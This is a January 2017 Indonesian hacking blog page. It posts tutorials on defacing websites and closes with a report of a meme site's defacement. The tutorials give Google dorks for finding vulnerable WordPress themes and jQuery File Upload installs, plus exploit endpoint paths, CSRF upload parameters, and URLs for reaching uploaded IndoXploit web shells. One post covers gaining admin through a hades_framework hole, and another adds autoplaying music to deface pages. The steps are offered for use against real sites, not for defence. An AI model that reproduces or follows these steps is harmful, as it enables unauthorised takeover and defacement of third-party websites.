Januari 2017

Kamis, 26 Januari 2017

Cara Menambahkan Lagu di Script Deface

16.36.00 Posted by Humar No Comments

HumarTutor - Lagu merupakan hal tambahan pada script deface untuk permasalahan ini. Karena dengan lagu bisa menambah ke-keren-an script itu. Kebanyakan script deface tidak memiliki lagu.

Nah, untuk itu disini kita akan belajar bagaimana cara menambahkan lagu pada script deface kita sendiri.

Bahan :

1. Script deface tentunya.

2. Notepad / Notepad++

Langkah :

1. Copy script berikut :

<iframe width="0" height="0" src="//www.youtube.com/embed/lqYQXIt4SpA?rel=0&autoplay=1&loop=1&playlist=60ItHLz5WEA" frameborder="0" allowfullscreen></iframe>

2. Perhatikan kode lqYQXIt4SpA dan 60ItHLz5WEA itu merupakan kode lagu nya, jika ingin mengganti, cari kode lagu youtube yang kamu inginkan.

Lalu, bagaimana cara mencari kode lagu yang diinginkan?
Contohnya :
https://www.youtube.com/watch?v=60ItHLz5WEA : Lagu Alan Walker - Faded

Jadi 60ItHLz5WEA merupakan kode untuk lagu alan walker - faded.

3. Masukkan kode lagu kedalam script diatas dan masukkan ke script deface.

4. Kemudian save script tersebut.

Coba untuk memasang script pada web. Jika sudah terdengar lagu, maka kalian berhasil. Tutorial ini sangat mudah, tapi perlu diperhatikan untuk permasalahan lagu yang tidak muncul.

nb : tidak semua lagu bisa ditambahkan pada script deface, jika kalian mencoba lagu A tidak berhasil cobalah untuk mengganti lagu B dan berhasil, maka permasalahan ada di lagu A yang tidak support.

Sabtu, 21 Januari 2017

Cara Deface Wordpress Theme Anthology Vulnerablity File Upload

22.29.00 Posted by Humar 2 Comments

HumarTutor - Cara Deface Wordpress Theme Anthology Vulnerability File Upload

Yak, sebenernya ini exploit lama, iseng iseng dorking eh... nemu vuln zh, yah share aja di HumarTutor deh
Lansung aja kuy...

Syarat :

1. Shell :

- Download Shell IndoXploit
- Download File Manager X.X (Mini Shell)

2.. Dork :

inurl:/themes/Anthology/

inurl:wp-content/themes/Anthology/

2. Exploit :

/functions/upload-handler.php

Contoh :

site.com/wp-content/themes/Anthology/functions/upload-handler.php

3. CSRF :

- CSRF Versi Online
- CSRF Versi HTML

Langkah :

1. Dorking dulu bos q

2. Exploit pake exploit diatas.

Vuln? ada tulisan error.

Ga ada? skip.

3. Selanjutnya eksekusi pake CSRF, terserah mau pake yang apa. Mau gampang ya Pake online.

Tampilan CRF Online

- URL = isi dengan web target.
- POSTFILE = untuk method ini pake "pexetofile" (tanpa kutip)

4. Kalo udah,
Sukses exploit? ada nama file yang lu upload.
Nothing? skip

5. Shell Access

site.com/wp-content/uploads/[yeat]/[month]/namafilenya.waug

EZ kan??

Jumat, 20 Januari 2017

Cara Deface Dengan Method jQuery File Upload Vulnerability

15.37.00 Posted by Humar No Comments

HumarTutor - Cara Deface Dengan Method jQuery File Upload Vulnerability

Mungkin jQuery File Upload adalah cara mudah buat deface, dengan upload saja seh.

Yang susah ya dork nya, kudu pinter pinter kalo pengen buat nemu yang vuln

Syarat :

1. Dork :

inurl:/assets/global/plugins/jquery-file-upload/
inurl:/jquery-file-upload/

2. Exploit

/server/php/index.php

contoh

site.com/assets/global/plugins/jquery-file-upload/server/php/index.php

3. CSRF

untuk CSRF pake yang online aja biar gampang

CSRF Exploiter Online

Post file? files[]

Langkah :

1. Dorking dulu

2. Nemu? exploit dulu

Blank?? skip

Vuln? setidaknya ada tulisan kayak gambar dibawah

foto : ken7ester

3. Pake CSRF Online

Post file? files[]

4. Shell Access ??

site.com/assets/global/plugins/jquery-file-upload/server/php/files/shell.php

Cara Deface Wordpress Add Admin Vulnerability Method

15.04.00 Posted by Humar 1 Comments

HumarTutor - Cara Deface Wordpress Add Admin Method (SIMPLE)

Setelah lama ga post, sekarang admin mau post cara deface Wordpress Add Admin, cara ini cukup simple karena dengan exploit + register saja kalian udah bisa jadi admin kwkw.

Terserah mau diapain kalo udah jadi admin yakan....

Mungkin cara ini udah lama ya, gpp de. Yang penting mah kalo Deface method ini ya dork nya yang harus mantep.

Syarat :

1. Shell kalian atau Download di

- Download Shell IndoXploit

- Download File Manager X.X (Mini Shell)

2. Dork :

inurl:/wp-content/themes/appius/

inurl:/wp-content/themes/Consultant/

inurl:/wp-content/themes/appius1/

inurl:/wp-content/themes/archin/

inurl:/wp-content/themes/averin/

inurl:/wp-content/themes/dagda/

inurl:/wp-content/themes/echea/

inurl:/wp-content/themes/felici/

3. CSRF

- HTML

- Versi Online

4. Exploit :

/hades_framework/option_panel/ajax.php

Contoh :

http://site.com/wp-content/themes/dagda/hades_framework/option_panel/ajax.php

Langkah :

1. Biasa lah, dorking dulu

2. Exploit pake exploit diatas

Vuln??

Blank kawan selain?? skip

3. Pake CSRF nya

kalo w pake CSRF versi online buatan mimin sendiri, gampang sih buatnya kalo mau buat sendiri

Add Admin CSRF Online

Seperti diatas tampilannya.

Caranya gampang

- Masukkin site nya, trus LOCK

- Masukkin email mu, trus SUBMIT

Kalo versi HTML ya anu sendiri

Sukses??

ada tulisan Sukses, Ga ada tulisan?? skip

4. Register di Web Target

Caranya??

wp-login?action=register

Contoh??

site.com/wp-login.php?action=register

5. Cek email kalian

6. Verifikasi

7. Login

Done, dah jadi admin

EZZ kan??

Kamis, 19 Januari 2017

Web Hiburan Meme 4tawa.co Di Retas???

20.33.00 Posted by Humar No Comments

HumarTutor - Web Hiburan Meme 4tawa.co Di Retas???

4tawa.co merupakan situs hiburan meme dan juga terdapat video - video lucu.
Website 4tawa.co ini mempunyai 400k lebih followers di fanspagenya.

Menurut Zone-h.org 4tawa.co diretas pada tanggal 13-01-2017. Dan diretas oleh KONSLET hal itu jelas dia memampangkan namanya di halaman 4tawa.co yang bertulis HACKED BY KONSLET.

Selain itu di laman 4tawa.co pada saat peretasan juga tertulis "ubuntu 13.10? apache? lol wkwkwkw. gak bisa hardening server mz?"

Dibawah itu juga terdapat nick nick yang diduga teman teman pelaku.

Juga dibagian footer laman tertulis Indonesia Hacker Rulez dan email pelaku yakni anas_ramadani@yahoo.it

Dikutip dari 3xploi7 bug POC nya adalah

Lavarel ninja media Script

Sampai sekarang website 4tawa.co bertuliskan
"Mohon Maaf, Untuk sementara web 4tawa.co sedang diperbaiki

Minta doanya dari seluruh member agar perbaikan ini tidak memakan waktu yang lama

Terima Kasih, :)"

Referensi ; 3xpoi7 bug

Categories

Kamis, 26 Januari 2017

Cara Menambahkan Lagu di Script Deface

Bahan :

Langkah :

Title :

Reviewed by

On

Rating :

Sabtu, 21 Januari 2017

Cara Deface Wordpress Theme Anthology Vulnerablity File Upload

Syarat :

Langkah :

Title :

Reviewed by

On

Rating :

Jumat, 20 Januari 2017

Cara Deface Dengan Method jQuery File Upload Vulnerability

Syarat :

Langkah :

Title :

Reviewed by

On

Rating :

Cara Deface Wordpress Add Admin Vulnerability Method

Syarat :

Langkah :

Title :

Reviewed by

On

Rating :

Kamis, 19 Januari 2017

Web Hiburan Meme 4tawa.co Di Retas???

Title :

Reviewed by

On

Rating :

Recent

Popular